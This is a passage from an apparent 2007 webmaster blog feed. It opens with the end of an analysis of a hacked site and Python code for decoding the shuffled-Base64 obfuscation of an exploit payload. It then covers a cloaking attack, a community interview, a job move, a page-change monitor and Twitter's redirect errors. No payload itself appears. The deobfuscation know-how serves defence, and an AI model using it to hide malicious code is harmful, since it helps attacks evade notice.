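    """Decode a custom-alphabet Base64 variant in the style of dc():
    table maps (charCode - 48) to a 6-bit value; values are packed
    least-significant-bits-first into bytes."""
    out, acc, bits = bytearray(), 0, 0
    for ch in data:
        acc |= table[ord(ch) - 48] << bits
        bits += 6
        while bits >= 8:
            out.append(acc & 0xFF)
            acc >>= 8
            bits -= 8
    return bytes(out)

def encode_custom(raw, table):
    """Inverse of decode_custom, handy for verifying the scheme."""
    inv = {v: i for i, v in enumerate(table)}
    out, acc, bits = [], 0, 0
    for byte in raw:
        acc |= byte << bits
        bits += 8
        while bits >= 6:
            out.append(chr(inv[acc & 0x3F] + 48))
            acc >>= 6
            bits -= 6
    if bits:  # flush leftover bits
        out.append(chr(inv[acc & 0x3F] + 48))
    return "".join(out)
```

With table = list(range(64)) this is plain little-endian 6-bit packing; the exploit’s own table (63, 56, 60, 51, …) is a shuffled permutation, which is what makes the payload unreadable at a glance.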

Next steps

You could follow these up with:

  • Checking the whois of the payload server and notifying the hoster (in this case probably fruitless)
  • Checking the sales page, searching for the affiliate ID and the setups running, and complaining to the affiliate networks about this webmaster
  • Mirroring a copy of the original server for analysis
  • Obviously moving to a different server, perhaps even a different hoster


The hacker had managed to patch the server-side code (most likely the Apache server) so that
– search engines see the normal page
– new users coming from search engines are hit with several exploits and shown an ad for antivirus software

Spotting something like this on your own sites is close to impossible. The search engine crawlers would not notice anything.

Recognizing something like this algorithmically on Google’s side would be possible with Google Toolbar data. Assuming all shown URLs are recorded, they could compare the URL clicked in the search results with the URL finally shown in the user’s browser (within the frames). At the same time, such a setup could be used to detect almost any kind of cloaking.
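As a purely illustrative sketch of that comparison (the function name is mine, and real detection would need far more care), the core check is just whether a click on a search result ends up on a different host than the one that was listed:

```python
from urllib.parse import urlsplit

def possible_cloaking(clicked_url, final_url):
    """Heuristic: a click on a search result should normally stay on the
    same host; ending up elsewhere hints at cloaking or hacked redirects."""
    return urlsplit(clicked_url).netloc != urlsplit(final_url).netloc
```

For a first-time visitor in the example above, the exploit document comes from the attacker’s server rather than www.jwentworth.com, which a check like this would flag.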

Scary stuff.

Copyright © 2010 johnmu.com. This Feed is for personal non-commercial use only. If you are not reading this material in your news aggregator, the site you are looking at is guilty of copyright infringement. Please contact johnmu.com so we can take legal action immediately.
Plugin by Taragana

August 24th 2007 News

Interview with Matt / “Dockarl”


(Photo: Matt at Google)

Hi “Doc”, it’s cool to have you here! It’s great that the web removes barriers like the physical distance from here in Switzerland to Australia. Matt has been one of the regular contributors to the Google Webmaster Help Groups since January 2007. He has a diverse background: agriculture and computers, an interesting mixture, or, as he puts it in his profile: “I know about cows and computers” :-) .

Looking at your first posts, I see a desperate webmaster, someone even screaming for “HELP!!!” in the thread titles. How did you find the Google Webmaster Help groups and what made you decide to originally post about your problems there?

Hmm.. how did I find the groups – I think I might have searched “How to contact Google” and came across the webmaster help groups there. I had to – I’d come across a problem that I just couldn’t get an answer to by doing a regular Google search, I knew it was an unusual problem and, like many other webmasters, I figured I might be able to find a real, living, breathing Googler somewhere to talk about the problem.

Did you get a satisfactory answer to your original questions in the groups? What elements were vital to that outcome?

Well, for some reason the answers to that post (it was back in 2006) have been ‘lost in the system’ but I did get a lot of hypotheticals from the regular group members – but nothing that helped, unfortunately.

How that came about is a very long story, but hell, you’ve asked, so I’ll tell you :-) . The person who owned the intellectual property we had been laboring to develop for the last two years had turned nasty – and was annoyed that we used their name on our website (and outranked them for it). My business partner and I were receiving ~20+ calls a day between us from the person. The phone calls started to elevate to the extent that we considered them threatening, and we were forced to call the police.

In the wash-up we just decided that, as a family business, we weren’t prepared to have to explain to my business partner’s kids (both under 5) why mum was crying and the police were ‘coming for a visit’ on a Saturday morning, so we decided to remove the name in question to stop further stress, even though we had every right to use it.

So I took the quickest path possible, made the changes to the website and asked Google to remove the cache. It had unintended consequences – it totally removed the ‘snippets’ from our website (our listings were title only), and we were left with a huge traffic decline. This, on top of everything else was absolutely crippling to the business. So, by the time I posted here I was getting a bit desperate – and it’s one reason I’m generally patient with people that come to the groups angry.

In the end, unfortunately no one here could give me the answer to the problem – it was out of their control. I hadn’t realized that a cache removal would remain in effect for 6 months. The main element that was vital to my outcome was Vanessa Fox (the beaut person that she is) who saw my post and stepped in and tweaked the system to let my site back in.

You’re a webmaster, you had issues with your site and Google and posted in the groups. If a webmaster came up to you and asked if it would be worthwhile to post about his problems there, what would you tell them? Would it make any difference if the webmaster was new to webmastering?

That’s an easy question. We’ve got a great community of beaut people here – you just don’t spend hours helping people gratis unless you’re passionate about it, so we tend to be universally ‘nice’ to people, especially newbies. I’d say ‘Go ahead, write your question, try to be succinct about it and TRY NOT TO PANIC!’. I’d also make sure that they knew that the people helping would more than likely be knowledgeable volunteers, so make sure you check your frustration at the door :)

What was it that made you stick around in the Google Groups, not only to ask more questions but also to help answer other people’s questions? What makes the Groups special compared to other forums?

Well, I think that JLH and yourself made the effort to email me and help with some problems I was having with a hobby site of mine called ‘utheguru’ – that was an awesome gesture and made me feel at home. That kind of thing, along with the occasional guest post by a Googler, is what makes this forum special.

In parallel to that, things had degenerated a lot further with our business to the extent that lawyers had become involved, and I had to put my PhD (and hence, income) on hold to spend my time dealing with that. I was looking for a stress release, and I’ve always been the kind of person that finds learning natural, cathartic and relaxing – so I got hooked.

If I’m honest, I also figured it was a way I could work towards another goal of mine – working with Google.

As an undergrad student, I read Page and Brin’s paper and thought, “wow, that’s a neat idea”. The whole concept of PageRank and linkages is something that’s really been around in science for hundreds of years. A good scientific paper is one that references other authors widely, and a reputable scientist is one that has papers referenced by many others. The CONCEPT of PageRank is really nothing new in science – it just took a neat idea by those two fellows to convert the concept into something that could transcend academia and become relevant to that new thing called ‘the Internet’. Google became popular first amongst scientists – that’s something I observed, and there was certainly a lot of buzz about it within that sector of society before it ever became the household name it is now.

I’ve been a Google user ever since, and I’m fascinated by the system itself, how it works, the company, the culture – everything about Google appeals to me.

Further to the reasons Google fascinates me (you didn’t ask but I’m gonna tell you anyway.. haha), before the rather wild ride of backless lingerie began, I’d worked for some time as a Scientist with the Sugar industry (especially on the field / mechanisation side), and one of the major things I worked on there was reward algorithms – trying to use disparate manufacturing measures at the mill end of the system to send ‘quality’ signals to harvester operators. Hmmm.. how do I explain this – well, I’ve gotta go into a little background detail…

Sugarcane harvesters chop up cane into little lengths, about 8 inches long, called billets. Along with the cane, the leaf material is also chopped up. If that leaf material reaches the mill, it can have a bad effect on the quality of the sugar produced, and it also makes the cane more expensive to process and transport. So, the harvesting machines have big 6 foot metal fans which rotate at about 1000 rpm – that’s a phenomenal tip speed. These fans sit above the cane right after it’s been chopped, and their aim is to remove the leaf material. Unfortunately, a whole complex set of interactions conspires to result in a situation where if you try ‘too hard’ to remove the leaf material, you also end up losing about 20% of the cane you harvest through those fans – but it’s invisible. A billet that’s gone through an extractor fan ends up looking something like desiccated coconut – and there is no way of knowing the losses exist unless you do scientific trials to prove it.

I’d done the trials – all through North Queensland, in Papua New Guinea – all over the place. We had proved the losses existed, and the cost to the industry was in the billions of dollars per year, let alone the environmental impact. But because you can’t actually SEE the losses, you have a hard time convincing people that they actually exist. We got to the stage where my team and I had convinced the industry that there was a serious problem, and the next step was obviously “How do we stop it”. We knew that there was a ‘sweet spot’ where those losses could be reduced to around 5% depending upon the way the harvester was operated. Since we didn’t have the ability to measure what was happening in the field on a real time basis, we had no choice but to use indirect measurements in the mill – like fibre, the sweetness of the cane etc, to try and infer what was happening in the field – to measure ‘quality’ of the job.

That became my focus, and I learnt along the way that when you’re trying to make a reward system based upon derived measures, the tiniest little change to your algorithm can have huge impacts upon the system you’re trying to model. Also, if you’re offering “rewards” based upon indirect measurements, you actually end up becoming an intrinsic part of the system you’re trying to model – in clearer terms, the whole system tends to change or adapt to maximize “profits”, which can play havoc with the “accuracy” of your algorithm.

It sounds completely unrelated, but that’s actually Google (and the spam struggle) in a nutshell. That’s one of the reasons I’m fascinated with it and feel at home here in the groups, where occasionally we get questions that make me think quite deeply about the challenges Google must face – and we get the opportunity to debate our views :) This thread about pagerank where Craig and I duked it out with full respect for each other’s opinion is one example I can think of that I’ve enjoyed.

You studied Agriculture and set up a shop to make and sell backless lingerie. I bet all the guys in the groups have visited your full site (for SEO reasons, I’m sure ;) ). How did that ever come about?

Ha – not only did I study Ag, but I managed to convince the government here to award me a scholarship to do a coursework Master’s degree in Computer and Comms engineering. I ended up with a few awards and an aggregate score of over 93% – without an undergrad engineering degree – I think that surprised everyone, even me :-) . But I guess it’s only natural – most people do best when they’re doing something they love. I’ve always been fascinated with those applications where IT, Engineering and Science intersect and meet ‘the real world’ – that’s kind of Googly.

An example – I can remember the time, when I was about 12 years old, that I blew up the family Commodore 64 trying to get it to drive solenoids to water the garden for Mum. I didn’t realise at the time that you need a transistor and a relay if you want to drive something hefty like a solenoid with a TTL output :-)

But apart from being a bit of a terror, I’ve also always been a traveler and got along easily with folks. As such, when I was writing my Masters thesis, I figured I’d go stay with some mates overseas – I had a load of frequent flyer points I wanted to use, they all offered to put me up for free, so I figured it was an opportunity too good to miss. The only ‘gotcha’ was that I was to provide the beer – Norway was a hoot – my oh my – the Vikings ARE NOT dead!

I ended up (between parties) writing most of my Master’s degree tapping away on my laptop, perched on the edge of a fjord whilst staying with my Norwegian Marine Biologist friend in Northern Norway for a few months mid 2005 – the 24 hour sunlight was GREAT.

On the way back I dropped in to see my Indian mate in Tirupur (the south of India, in a state called Tamil Nadu) and ended up spending a few months there too. Tirupur is a big textile producing area, and I made friends with some of the big players there.

When I finally arrived back in Australia I mentioned that to my Brother in Law (a solicitor) and he said “well, I’ve got some clients that are looking to manufacture a neat new product they’ve developed” – so, before I knew it, I was off to India where I learnt all about ladies underwear, mobilon and thread density. We quickly got a few test shipments under our belt.

Upon returning my brother and I were asked if we’d like to get more deeply involved with the sale and promotion of the product – somehow I let myself be convinced. There began the roller coaster ride – I became manufacturer (traveled to China as well for that part several times), web developer, email wrangler, undy packer, book keeper, promoter and media spokesperson. It was crazy work and it was unpaid – the cost of manufacture and promotion sucked away much of my savings and any profit the product brought in before it ever had a chance to reach my pocket – although attending the modeling shoots was fun, and the POSSIBILITY that it might become something big was intoxicating!

But – a word from the wise – ever heard of Ali Baba and the 40 Thieves? Those folk were in the rag trade :-) Get involved at your peril.

One of your sites has recently had a strange kind of trouble with Google’s index, with all sorts of possible explanations but no resolution so far. For the average webmaster these kinds of situations are incomprehensible and terribly frustrating. What would you tell the webmaster when stuck in a rut like that – keep working on the problem or let it sit for a while?

First I’d ask them to think about whether they’d made any big changes to their site recently – to try and hone in on whether it might be something they’d caused themselves, rather than anything algorithmic.

Next, if I’d decided it might indeed be a penalty, I’d usually give them a copy of the webmaster guidelines and say “What do you think it might be?” – people usually have a fairly good idea about what they might have done wrong if a potential penalty is involved. I’d then ask them to write out a list of potential issues, and correct them + submit a reconsideration request and wait a month. If that didn’t work, time to put on the “mad scientist” hat and get methodical about things.

First I’d probably use Google to do a search for other people experiencing the problem. From there I’d approach these groups. If that drew blanks, I’d then start tweaking things with their site – but softly softly – one change at a time, waiting at least a week between changes so that I’d have a fair idea what ‘the cure’ was for future reference.

If that didn’t work I’d probably just start to assume that they were the victim of Google collateral damage – hell, we all know it happens, and I’d be submitting some attention grabbing posts to this group to try and ‘elevate it’ to the attention of Googlers, so that they could use their gadgetry to try and work out what the story was.

At that stage things are out of your hands, and you just hope that perhaps you’ve alerted Google to a potential “Googlebug” that might stop others from experiencing the same kinds of issues.

Assuming you had full access to Google’s servers and some web designers + programmers to help you, what would you change?

Hmmm.. looking back through my prep notes for my Google interview here…

I think I’d start with the problem of penalties. I’d be sitting down with the alg team and trying to thrash out a way that we could actually help those ‘ma and pa’ webmasters that have accidentally shot themselves in the foot – and to do so without giving the spammers a leg up.

I’d write out a list of things that we considered ‘top secret’ and another of those factors that were ‘out of the bag’, and I’d set about implementing changes to Google webmaster tools to alert folks to little things – like obviously hidden text – that might be resulting in a penalty and which they might not know about. Those kind of issues, to my mind anyway, are already well known amongst spammers and you can’t lose much by letting people know about them.

As for the more complex things, like, for example, keyword density (it’s a simple one, I know, but let’s start there) – you know, things that aren’t black or white – things where there were shades of grey, I’d be making tools to show them which side of the line they are tending towards – like a gauge, or traffic lights.

“We think your site is looking a little spammy – here’s an orange alert”.

Naturally, the alg team would then say to me “Well Matt, that’s all well and good, but if we start giving folks that kind of info, we’re essentially giving the spammers a great tool which they can use to test the limits of our alg, too”. I’d then say to them, well, why don’t we use cluster analysis to break sites down into 100 different categories of ‘spamminess’ – the traffic lights would just show how spammy you are relative to others in your ‘spamminess cluster’ – so really, if we give a green light to a known spammer, all we are telling him is that he’s kind of ok compared to the other spammers within his uber spammer group – but he needn’t know that :-)

For the spammers, the lights system would achieve nothing. For the ma’s and pa’s that are relatively innocuous, having a red light could be a huge help – just knowing you have a penalty lets you know that it’s actually something you can track down and correct.

But I suspect the other engineers would raise a whole load of reasons that my approach wouldn’t work – but I love the dynamics of a group, and part of the enjoyment of working in one is often the synergy that you find when you’re sitting down with a whole bunch of folks with common interests and intellect thrashing out a new idea – that’s how a lump of coal turns into a diamond.

That would be a plum position to be in.

After that I’d probably start gravitating towards the alg design / testing side of things – as that’s something I’m fascinated with – setting up mega test networks and conducting sensitivity analysis and pre-testing of new algorithm ideas would be lots of fun and extraordinarily satisfying – I love taking good ideas and helping make them better.

I’ve also thought I’d like to make a tool that shows a graphical representation of the linking structure of a site – with things like nofollow, noindex as an overlay – that could be a great troubleshooting tool for lots of problems too.

But, to be honest, most of my programming experience is at the nuts and bolts level – A GUI to me is a command line and a prompt – I’ve got a lot of engineer in me. I’d be able to write the crawlers and mangle the database, but I’d have to leave the bells and whistles to someone else :-)

You’ve done a lot of different things (so far, including an interview with Google). If you could rewind back to when you started studying, do you think you would do anything differently knowing what you know now (other than obviously buying some good stock)?

Cool! A rewind button!

Firstly, I wouldn’t have flown Qantas to my big interview – it was a debacle from start to finish – they lost my bags (clothes, books, notes), my flights out (and back) were both delayed 12 hours or more and diverted because of tech probs – in short, I arrived sleep-deprived and not feeling prepared, and I think I only found my feet during the interview just after lunch. It was like an out-of-body experience.. grrr….

Secondly – I wouldn’t have studied Agriculture.

We had loads of fun out there, but my natural aptitudes are IT / Science / Engineering. My ag degree included a lot of that, but I tended to get let down by the sheer boredom of prac sessions that included watching grass grow – honestly.

I’m the kind of person that thrives on a challenge – so I did poorly at the “watching grass grow” practical subjects, and tended to dux the more academic subjects that others found a tad difficult – like advanced stats, biometry etc – I did the wrong degree for my skillset and, like it or not, time is a depreciating commodity.

I’m an extremely outdoors person, and I thought back then that if I studied IT or engineering I’d be stuck in front of a computer all day – but I now realize that that’s not really the case at all. Shucks, if I’m honest with myself, I LIKE spending time in front of the computer. I’ve come to realise that it’s the life / work balance that’s important – if you don’t have one, you tend to lose out on the other.

So with Ag, I just ended up naturally gravitating towards work that required me to be ‘stuck’ in front of a computer all day anyway, but getting paid poorly for it, so the opportunities to go outside and do adventurous things in your spare time were limited.

I’ve had some massive, great interesting experiences with the route I chose back then, most of which I don’t regret, but if I’d done IT or Eng instead of Ag, I think I’d be in a better place, career wise. You mention “good stock” – it’s funny that, because luckily I realized early that this wasn’t what I wanted to do long term, and tended to invest my wages well – so I’ve managed to have a decent lifestyle during the recent ‘challenges’ which is LUCKY :-)

Is there anything you’d like to add?

John, congrats on the new job, and I’m looking forward to achieving a dream like that myself soon, too – good on you, mate! :-)

Thank you very much for your time and the replies, Matt!


August 22nd 2007 News


Moving to a new office in September


(Diagram: the dream job)

The last couple of years I’ve spent a lot of time in the Google Webmaster Help groups. Most of that time I’ve tried to help people with problems with their websites and Google. Together with the webmaster (every site is unique) and the other active members in the groups, we’ve tried to work out where things are going wrong and what needs to be changed, and often we’ve been able to fix things so that the website is back in the index, the content is getting found and, hopefully, the webmaster has learned a thing or two. The best part for me is when a webmaster not only changes a few technicalities but is also able to take in and implement changes in strategy, changes that make the site even better for his visitors and in the end get his unique content easily found. I love it when that works out!

I really enjoy these kinds of problems – finding a source of trouble in a giant heap of pages, using experience, guesses and estimations based on a “black box” that we know as Google. These puzzles keep your mind sharp and force you to think in a connected way. Sometimes you have to take a few steps back and look at the overall picture to find the real issues – and that’s something which is hard to do when you’re directly involved. Taking a look at the larger picture is something that takes a bit of practice, and thankfully it’s something that is done often in another place I love to be, cre8asite forums.

There’s a reason why I even got involved with all these puzzles in the first place: I know there is a lot of really important information out there that just can’t be found, and if it’s not findable, it will get lost. Perhaps forever. It might not be the solution to life, the universe and everything, but there is so much out there, online, on the web, that just can’t be found because of some technicality that the webmaster never thought about. On the one hand, I want to help the webmaster get found; on the other hand, I’d love to help the search engines find his content, regardless of what technicalities he has forgotten.

Taking the next step

You can probably guess what’s coming up next 🙂 .

Come September, I’m going to be working for Google in their Zürich (Switzerland) office. I’m joining the team around the Webmaster Tools as a Webmaster Trends Analyst. Looking at the diagram above, being able to do that just about hits the sweet spot in the center – something I’m good at, something I love doing and then: something they’d even pay me to do. It doesn’t get any better. I can’t wait.

What will that mean for the GSiteCrawler and my other websites?

Fortunately I’ve been able to pass off almost everything to my old company, where they have someone who will be able to take over where I left off. At the moment the main problem is the language barrier (English vs German) – but I’m confident that it will improve. Please be patient as they get up to speed 🙂 – and of course remember that their main business has nothing to do with websites and search engines.

What will that mean for my forum presence?

It would be nice if I could be as present as ever – perhaps with some insights that can help even more. Realistically, however, I know it will take some time before everything settles down and I actually have enough time to do as much as I would like in the forums. Additionally, it will almost certainly mean less speculation on my part about things going on within the “black box” 😀 . My goal is to make sure that the communication between webmasters and the engineers at Google can continue to grow, in quantity and especially in quality. That might be through forum postings, through blog postings, at conferences or small meet-ups, with the help of tools and personalized notifications, perhaps even on Google-Talk.

What about this blog?

This blog will remain my personal blog. I won’t be speaking on behalf of Google here. The opinions expressed here are and will remain solely my own. Don’t ask me to make a comment on anything if you want an official answer :). And anyway: don’t trust anyone (even if he will soon work for Google), test it for yourself. Trust me on that. Errmm. Whatever.

Countdown to September

Please bear with me while I’m packing things up, tying up loose ends in the office and generally getting more and more nervous. I have a few blog posts that are prepared (in my head) which I hope to put online and a few more interviews to make. I can’t wait for September. Woohoo!

(The graphic is from Scott Hanselman’s blog, who’s doing the same move at about the same time, only to Microsoft instead. Congratulations, Scott!).

August 20th 2007 News

Check your web pages for hacks and unauthorized changes

Comments Off on Check your web pages for hacks and unauthorized changes

Websites have become popular targets for hackers, who either try to add elements that automatically download “malware” (viruses, etc.) or try to add hidden links (SEO hacking) to other websites. Quite often, these kinds of changes are not noticed by the webmaster or website owner. You could wait until a visitor complains or until you receive an email from Google for spreading malware (or for having hidden links to “bad places”), but that is slow, unreliable and usually too late.

There are services available that can track changes on your web pages automatically, but sometimes it is good to have something like that under your own control (or perhaps as a backup to an online service). To keep a record of changes on web pages, I have put together a small Windows batch file that checks a list of pages and emails you any changes it finds. It will also email you when the server is not reachable. You could use the same tool to keep track of changes on third-party web pages.
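As a rough illustration of the idea (not the batch file itself), here is a minimal Python sketch that compares freshly fetched content against a cached copy; the function name and cache layout are my own invention:

```python
from pathlib import Path

def page_changed(key, content, cache_dir):
    """Compare freshly fetched page content against the cached copy.

    Updates the cache and returns True when the page is new or has
    changed since the last check -- the point where the batch file
    would send its notification email.
    """
    cache_dir = Path(cache_dir)
    cache_dir.mkdir(parents=True, exist_ok=True)
    cached = cache_dir / f"{key}.html"
    if cached.exists() and cached.read_bytes() == content:
        return False                 # unchanged: nothing to report
    cached.write_bytes(content)      # remember this version for next time
    return True                      # new or changed: notify

# Hypothetical usage -- in the real script, wget does the fetching:
# import urllib.request
# body = urllib.request.urlopen("http://example.com/").read()
# if page_changed("example", body, "cache"):
#     print("page changed, send mail")
```

The real batch file also handles the unreachable-server case; that part is left out here to keep the sketch short.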

The download is available here:

In order to use this tool, you will need two additional downloads:

Follow the instructions in the “readme.txt” within the ZIP file to install and set up this script.

Note: As mentioned in the instructions, you cannot list URLs with parameters directly – you need to use tinyurl.com to create a short version, which can be listed.

Once you have set the files up, make sure that the “checkurls.txt” file contains the URLs that you want to track (along with a short identifier for each) and then just double-click “checkall.bat”. You could also use the Windows Task Scheduler to run the batch file automatically, or put a shortcut to it into your Startup folder so that it runs whenever you log in.

One URL to test it with is http://johannesmueller.com/ – within that page, the server embeds a counter as an HTML comment, so the page changes on every request. The program should flag that URL as changed every time you run it. If you include a URL like that in your list, you can be fairly certain that the program is working properly as long as you keep receiving notifications for it.

The email sent to your account contains a listing of all changes (with line numbers), based on the Windows tool “fc” (file compare).
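For readers without the Windows “fc” tool at hand, the same kind of comparison can be sketched in Python with the standard difflib module (the sample page lines are made up):

```python
import difflib

old = ["<html>", "<!-- counter: 1041 -->", "</html>"]   # cached copy
new = ["<html>", "<!-- counter: 1042 -->", "</html>"]   # live copy

# unified_diff plays the role of "fc" here: changed lines are marked
# with - (old) and + (new), and the @@ header gives line positions.
diff = list(difflib.unified_diff(old, new, "cached", "live", lineterm=""))
print("\n".join(diff))
```

The output lists each changed line once for the cached version and once for the live version, which is exactly the information you want in a notification email.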

The code (batch file) is released into the public domain – but I would really appreciate a short note about any changes you make. Yeah, I know, batch files are sooo 80’s :-). It would be trivial (except perhaps for the file comparison) to convert this tool into something that runs standalone, but as a batch file almost anyone can modify it as they see fit, without having any fancy programming environments installed.

August 19th 2007 Uncategorized

Twitter indexing peculiarities

Comments Off on Twitter indexing peculiarities

This post has one main reason: popular sites don’t always get it right. You can also turn that around: you don’t have to get everything right in order to be popular. Never do something on your site just because a large site does it like that.

Combine web 2.0 with a search engine and what do you get? Lots of rel=nofollow links :), heh. You’d assume they could get a few things right with regard to search engine optimization, though.

Think again.

I hope you’re listening, Twitter 😉 and all of you who aren’t.

Canonical redirects

A canonical domain redirect is one of the first specialized, technical, SEO-type things that a webmaster learns to set up. Google lets you set your preferred domain version in its Webmaster Tools, but you will usually still want to set up a 301 redirect for all the other engines. This is fairly simple to do on Apache, but it is also easy to get wrong.
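For example, a common .htaccess recipe for a www-to-non-www 301 redirect looks roughly like this (assuming Apache with mod_rewrite enabled; substitute your own domain):

```apache
RewriteEngine On
# Send www.example.com permanently to example.com
RewriteCond %{HTTP_HOST} ^www\.example\.com$ [NC]
RewriteRule ^(.*)$ http://example.com/$1 [R=301,L]
```

The [R=301] flag is what makes the redirect permanent; leaving it off gives you a 302, which is exactly the mistake discussed below.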

Checking the server headers for http://www.twitter.com/ you see:

Results of the http://oyoy.eu/ server-headers test
Tested at 17.08.2007 21:12:59:

Result code: 302 (Found / Found)
Location: http://twitter.com/
Server: BIG-IP
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 0
New location: http://twitter.com/

Result code: 200 (OK / OK)
Connection: close
Date: Fri, 17 Aug 2007 21:13:00 GMT
Set-Cookie: _twitter_session=somelongnumber; domain=.twitter.com; path=/
Status: 200 OK
X-Runtime: 0.27641
ETag: “evenlongernumberhehehe”
Cache-Control: private, max-age=0, must-revalidate
Server: Joyent Web
Content-Type: text/html; charset=utf-8
Content-Length: 15000

The canonical redirect on twitter.com is incorrectly set up as a 302 redirect, not 301.
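You can reproduce this kind of check yourself. Here is a hedged Python sketch (the helper name is my own) that fetches a URL without following redirects and reports the status code and Location header, demonstrated against a small local test server that mimics Twitter’s 302:

```python
import threading
import urllib.error
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

class NoRedirect(urllib.request.HTTPRedirectHandler):
    """Stop urllib from silently following redirects, so the first
    response (the redirect itself) can be inspected."""
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None  # makes urllib raise HTTPError for 3xx responses

def check_redirect(url):
    """Return (status_code, location); location is None when the
    response is not a redirect."""
    opener = urllib.request.build_opener(NoRedirect)
    try:
        resp = opener.open(url)
        return resp.getcode(), None
    except urllib.error.HTTPError as e:
        return e.code, e.headers.get("Location")

# Local demo server that answers like twitter.com's front end did:
class Mimic302(BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(302)   # should be 301 for a canonical redirect
        self.send_header("Location", "http://example.com/")
        self.end_headers()
    def log_message(self, *args):  # keep the demo quiet
        pass

server = HTTPServer(("127.0.0.1", 0), Mimic302)
threading.Thread(target=server.serve_forever, daemon=True).start()
status, location = check_redirect(f"http://127.0.0.1:{server.server_port}/")
print(status, location)
server.shutdown()
```

Run against a real site, the same helper shows at a glance whether the canonical redirect answers 301 or 302.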

A 302 redirect can make sense if your site’s current main page is not the root URL – in that case, your server can 302 redirect from http://domain.com/ to http://domain.com/pages/cms/page.php?id=1 (or wherever your actual page is located). The search engines will then see the temporary redirect and keep the original URL in the index, albeit with the content of the final URL.

Yahoo! was one of the first search engines to publish a strict set of guidelines for handling 302 redirects, and you can see the effect clearly in their index. When you check the indexed URLs from www.twitter.com and click on the cache link, it shows where the actual content came from:

How bad is this problem? Well… Both Yahoo (approx 6’400 URLs) and MSN (approx 3’100 URLs) have www-versions of twitter.com in their index. Google seems to have interpreted the 302 redirect as a 301, perhaps because “twitter.com” is shorter than “www.twitter.com”.

One of the problems with a 302 redirect is that search engines might assume that they are still on the original URL, www.twitter.com, when it comes to interpreting links. This is problematic when links are relative, as many are on the Twitter pages. A link like <a href=”/friends/index/813286″ … > can be interpreted as a link to “http://www.twitter.com/friends/index/813286”. By mixing relative linking with a broken canonical redirect, the site is effectively promoting the incorrect version of its URL.
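The resolution itself is easy to demonstrate with Python’s standard urljoin; a crawler that (wrongly) keeps the www host as its base URL resolves Twitter’s relative links against it:

```python
from urllib.parse import urljoin

# Base URL as a crawler might see it after a misinterpreted 302:
base = "http://www.twitter.com/home"
# Relative link as it appears in the page markup:
link = "/friends/index/813286"

print(urljoin(base, link))  # → http://www.twitter.com/friends/index/813286
```

With an absolute link (or a correct 301 on the www host), the same URL would only ever resolve to the canonical twitter.com version.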

Additional canonicalization problems

What, more canonicalization problems? Some servers are set up to serve the same content through https (the secure connection). If a server does that, it makes sense to block indexing of that content, either through a robots meta tag or (for Google) the new X-Robots-Tag in the HTTP header. Twitter has the https:-version of its URLs indexed – at least on Google (though you can’t query these separately); I didn’t spot any on Yahoo or MSN.
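On Apache, the HTTP-header variant could be sketched roughly like this inside the https virtual host (assuming mod_headers is enabled; at the time of writing, Google is the only engine that has announced support for this header):

```apache
# In the https:// VirtualHost only: ask crawlers not to index this copy
Header set X-Robots-Tag "noindex"
```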

Even more canonicalization issues – getting your server’s IP address indexed

… is a really bad idea. What happens when you move? What happens to the cookies stored for the site? What happens when you want to expand and add a round-robin DNS system to spread the load over multiple servers?

Google (385’000 URLs), Yahoo (5’700 URLs) and MSN (22 URLs) all have Twitter’s IP address indexed. As far as I can tell, this arose from a glitch in their website some time back, when many of the profiles were linked through the IP address instead of the domain name (from the twitter.com domain name). The profiles are now linked with an absolute URL on “twitter.com”, but they also used to be linked with relative URLs, further promoting the IP address for Twitter profiles.

On Apache, with a proper .htaccess file, this would be easy to fix: just 301 redirect all such accesses to the proper URL.

And even more canonicalization problems …..

Since the server responds to all requests with the content of twitter.com, any server name that resolves to Twitter’s IP address can get indexed. One domain that I found was gezwitscher.com (which means something like “twitter” in German). There are also several subdomains on other sites that resolve to that IP address.
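One hedged sketch of an Apache fix (assuming mod_rewrite, with twitter.com standing in as the canonical host) would redirect any unexpected Host header, whether an IP address, www, or a stray domain like gezwitscher.com, in one rule:

```apache
RewriteEngine On
# Anything that is not exactly the canonical host gets a 301 to it
RewriteCond %{HTTP_HOST} !^twitter\.com$ [NC]
RewriteRule ^(.*)$ http://twitter.com/$1 [R=301,L]
```

A catch-all like this closes the www, IP-address and foreign-domain variants all at once, instead of chasing each one separately.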

Twitter has a canonicalization problem, though some of the engines are guessing more or less correctly about what should be indexed and what shouldn’t.

Use of rel=nofollow microformats on links

The original introduction of this microformat mentions that it can be used to prevent comment spam from gaining value through links. It has since been expanded into a general way to block the crawling of a link (though this is a bit controversial, as the linked URL could be found and crawled through any other link without rel=nofollow anyway).

Twitter has recently added the rel=nofollow microformat to all links that are posted by its users (there are no anonymous comments to postings on Twitter). Other, internal links are left without this microformat. However, the users’ homepages (from their profiles) are also linked without the rel=nofollow microformat (if a user regularly uses the site and has many friends who link to him, it can be assumed that the user’s homepage is not spammy). If the homepage is trusted, why would the other links that the user posts not be trustworthy? The links are already hidden behind “tinyurl” (it would be nice to see the final URL as a tooltip over the link, by the way), so why add the nofollow?

Adding the nofollow microformat to the posted links does not seem consistent with the handling of the user’s homepage links. However, it’s still better to have just the homepage linked than not have any links at all.

If Twitter had to rely on traffic from search engines, these issues could have a big impact. I imagine Twitter does not have to rely on that traffic source, which makes issues like the above less important. However, since the profiles are indexable, perhaps they do want some sort of traffic from the search engines, at least based on those profiles.

So what …. ?

Twitter can get away with these mistakes because it doesn’t need the search engines. Most other sites are different and need all the help they can get – which includes technicalities like fixing the canonical redirect and reducing the number of URLs in use.

PS: I have nothing against Twitter, in fact I really like using it for quick updates :).

August 18th 2007 Uncategorized